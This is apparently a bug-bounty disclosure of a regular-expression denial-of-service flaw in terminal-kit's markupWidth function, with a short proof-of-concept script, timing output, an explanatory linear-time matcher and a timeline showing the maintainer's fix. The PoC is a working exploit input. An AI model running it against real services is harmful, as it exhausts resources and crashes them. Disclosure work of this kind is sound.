Inefficient Regular Expression Complexity in cronvel/terminal-kit

Valid

Reported on Sep 22nd 2021


Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in terminal-kit. It allows causing a denial of service when calling the function markupWidth. The ReDoS vulnerability is mainly due to the regex /\^\[[^\]]*]|\^(.)/g and can be exploited with the following code.

Proof of Concept

// PoC.js
var terminalKit = require("terminal-kit/lib/misc.js");

// Each iteration doubles-up the input: i * 10000 copies of "^[" with no closing "]".
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = '' + '^['.repeat(i * 10000);
    // Time a single markupWidth() call on the crafted string.
    terminalKit.markupWidth(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}

The Output

"attack_str.length: 20000: 309 ms"
"attack_str.length: 40000: 1047 ms"
"attack_str.length: 60000: 2346 ms"
"attack_str.length: 80000: 4185 ms"
"attack_str.length: 100000: 6505 ms"
"attack_str.length: 120000: 9367 ms"

Impact

This vulnerability is capable of exhausting system resources and leads to crashes.
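
The quadratic growth in the output above comes from the first alternative of the regex: with no "]" in the input, `[^\]]*` scans to the end of the string at every "^[" before the second alternative matches. The following is an added example, not code from this report or from terminal-kit and not the fix merged upstream; the hypothetical `linearMatches` finds the same matches as the regex in a single pass by checking up front whether a "]" still lies ahead, and `regexMatches` is a reference used only for comparison.

```javascript
// The regex named in the report.
const MARKUP_RE = /\^\[[^\]]*]|\^(.)/g;
// "." (without the s flag) does not match these characters.
const LINE_TERMINATORS = new Set(["\n", "\r", "\u2028", "\u2029"]);

// Reference: every [index, length] pair the regex matches.
function regexMatches(str) {
  return Array.from(str.matchAll(MARKUP_RE), (m) => [m.index, m[0].length]);
}

// Hypothetical replacement: same matches, one forward pass.
function linearMatches(str) {
  const out = [];
  const lastClose = str.lastIndexOf("]"); // -1 when the input has no "]"
  let i = str.indexOf("^");
  while (i !== -1 && i + 1 < str.length) {
    const next = str[i + 1];
    let len = 0;
    if (next === "[" && lastClose >= i + 2) {
      // A "]" is known to exist ahead, so this search stops inside the match
      // and its cost is paid back by skipping the matched span.
      len = str.indexOf("]", i + 2) - i + 1;
    } else if (!LINE_TERMINATORS.has(next)) {
      // Second alternative: "^" followed by one non-newline code unit.
      len = 2;
    }
    if (len > 0) out.push([i, len]);
    // Resume after the match, or one position on when nothing matched here.
    i = str.indexOf("^", i + (len || 1));
  }
  return out;
}
```

On the PoC input ("^[" repeated, no "]"), `linearMatches` skips the bracket search at every position, so the work per "^[" is constant instead of proportional to the remaining input.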

Occurrences

We have contacted a member of the cronvel/terminal-kit team and are waiting to hear back 2 months ago
Cedric Ronvel validated this vulnerability 2 months ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
Cedric Ronvel confirmed that a fix has been merged on a2e446 2 months ago
Cedric Ronvel has been awarded the fix bounty
misc.js#L185 has been validated